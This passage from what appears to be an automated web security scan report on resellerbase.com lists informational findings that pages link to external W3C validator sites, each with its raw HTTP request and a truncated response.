Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.249. http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.250. http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/7/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.251. http://www.resellerbase.com/detail/7/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.252. http://www.resellerbase.com/detail/7/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/7/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/7/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.253. http://www.resellerbase.com/detail/8/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/8/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/8/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/hostcentric-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.254. http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/8/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.255. http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/8/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.256. http://www.resellerbase.com/detail/8/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/8/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.257. http://www.resellerbase.com/detail/8/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/8/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/8/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/8/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.258. http://www.resellerbase.com/detail/9/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/9/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/netapplications-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.259. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.260. http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/9/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.261. http://www.resellerbase.com/detail/9/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.262. http://www.resellerbase.com/detail/9/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/9/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.263. http://www.resellerbase.com/detail/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.264. http://www.resellerbase.com/get_rated.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/get_rated.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.265. http://www.resellerbase.com/goods-wholesale/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.266. http://www.resellerbase.com/goods-wholesale/googlepr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/googlepr.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/goods-wholesale/googlepr.php?link_id=6

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /goods-wholesale/googlepr.php?link_id=6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
